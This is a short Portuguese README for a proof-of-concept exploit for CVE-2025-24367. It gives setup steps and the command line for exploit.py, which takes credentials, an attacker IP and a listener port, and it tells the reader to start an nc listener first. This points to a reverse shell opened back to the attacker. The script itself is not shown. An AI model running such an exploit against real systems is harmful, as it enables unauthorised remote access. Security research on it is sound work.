
Prova de Conceito para CVE-2025-24367
Importante — Leia isto primeiro:
Este repositório e oexploit.pysão fornecidos apenas para fins educacionais e de pesquisa. Não use este código contra sistemas, redes ou serviços para os quais você não tenha autorização explícita e por escrito. O acesso não autorizado a sistemas de computador é ilegal e antiético. Ao usar este código, você concorda em cumprir as leis aplicáveis e as políticas institucionais.
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
Antes de executar o script, certifique-se de ter um listener nc em execução. Execute o script sem proxy, a menos que esteja depurando:
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
Lembrete final: Este script e o README são apenas para uso educacional. Nunca use estas ferramentas para acessar sistemas ilegalmente.